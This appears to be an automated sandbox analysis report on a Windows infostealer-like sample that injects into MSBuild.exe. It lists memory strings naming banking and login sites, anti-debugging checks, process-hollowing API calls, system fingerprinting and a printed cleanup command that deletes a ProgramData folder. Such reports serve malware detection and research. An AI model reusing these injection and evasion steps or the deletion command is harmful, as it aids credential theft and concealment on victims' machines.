                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                          Source: BFCGDA.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                          Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: BFCGDA.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                          Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                          Source: BFCGDA.4.drBinary or memory string: discord.comVMware20,11696494690f
                          Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                          Source: BFCGDA.4.drBinary or memory string: outlook.office.comVMware20,11696494690s
                          Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                          Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                          Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: BFCGDA.4.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                          Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: BFCGDA.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                          Source: BFCGDA.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                          Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: BFCGDA.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                          Source: BFCGDA.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                          Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: BFCGDA.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                          Source: BFCGDA.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                          Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: BFCGDA.4.drBinary or memory string: dev.azure.comVMware20,11696494690j
                          Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_4-82721
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_4-82737
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_4-84052
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                          Source: C:\ProgramData\CBFCFBFBFB.exe Process queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006120AD VirtualProtect,LdrInitializeThunk,GetConsoleWindow,CloseHandle,SetCursorPos,0_2_006120AD
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061B5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0061B5E6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418950
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061208F mov edi, dword ptr fs:[00000030h]0_2_0061208F
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639362 mov eax, dword ptr fs:[00000030h]0_2_00639362
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063937A mov eax, dword ptr fs:[00000030h]0_2_0063937A
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639385 mov eax, dword ptr fs:[00000030h]0_2_00639385
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00650472 mov eax, dword ptr fs:[00000030h]0_2_00650472
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627EE8 mov eax, dword ptr fs:[00000030h]0_2_00627EE8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061EE9C mov ecx, dword ptr fs:[00000030h]0_2_0061EE9C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004014AD mov eax, dword ptr fs:[00000030h]4_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040148A mov eax, dword ptr fs:[00000030h]4_2_0040148A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004014A2 mov eax, dword ptr fs:[00000030h]4_2_004014A2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418599 mov eax, dword ptr fs:[00000030h]4_2_00418599
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041859A mov eax, dword ptr fs:[00000030h]4_2_0041859A
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AF208F mov edi, dword ptr fs:[00000030h]13_2_00AF208F
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AFEE9C mov ecx, dword ptr fs:[00000030h]13_2_00AFEE9C
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B07EE8 mov eax, dword ptr fs:[00000030h]13_2_00B07EE8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062A4E7 GetProcessHeap,0_2_0062A4E7
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006174A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006174A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061B5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0061B5E6
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006177C5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006177C5
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00617952 SetUnhandledExceptionFilter,0_2_00617952
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041D016
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0041D98C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0042762E SetUnhandledExceptionFilter,4_2_0042762E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8BB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C8BB66C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8BB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C8BB1F7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CA6AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6CA6AC62
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AF74A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00AF74A0
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AFB5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00AFB5E6
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AF77C5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00AF77C5
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AF7952 SetUnhandledExceptionFilter,13_2_00AF7952

                          HIPS / PFW / Operating System Protection Evasion

                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                          Source: C:\ProgramData\CBFCFBFBFB.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,4_2_0040F54A
                          Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                          Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_004124A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_0041257F
                          Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                          Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
                          Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000
                          Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000
                          Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000
                          Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000
                          Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 882008
                          Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                          Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
                          Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000
                          Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000
                          Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000
                          Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 11BF008
                          Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit
                          Source: C:\ProgramData\CBFCFBFBFB.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639076 cpuid 0_2_00639076
                          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0062A0B0
                          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_0062A1B6
                          Source: C:\Users\user\Desktop\file.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,0_2_0065D2BB
                          Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0062A285
                          Source: C:\Users\user\Desktop\file.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0065F44E
                          Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00629921
                          Source: C:\Users\user\Desktop\file.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,0_2_00661928
                          Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00621A42
                          Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_00662A18
                          Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00629BC3
                          Source: C:\Users\user\Desktop\file.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,0_2_00661C46
                          Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00629C0E
                          Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00629CA9
                          Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00660C9C
                          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00629D34
                          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00621EEC
                          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00629F87
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_00410DDB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0042B0CC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_0042B1C1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_00429A50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_0042B268
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_0042B2C3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,4_2_0042AB40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,4_2_004253E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_0042B494
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,4_2_0042749C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesA,4_2_0042B556
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_00429D6E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,4_2_0042E56F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_00427576
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_00428DC4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_0042B5E7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_0042B580
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_0042B623
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,4_2_0042E6A4
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_00B0A0B0
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetLocaleInfoW,13_2_00B0A1B6
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00B0A285
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,13_2_00B09921
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: EnumSystemLocalesW,13_2_00B01A42
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: EnumSystemLocalesW,13_2_00B09BC3
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: EnumSystemLocalesW,13_2_00B09CA9
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: EnumSystemLocalesW,13_2_00B09C0E
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_00B09D34
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetLocaleInfoW,13_2_00B01EEC
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: GetLocaleInfoW,13_2_00B09F87
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006176BF GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006176BF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00410C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA,4_2_00410C53
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,4_2_00410D2E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
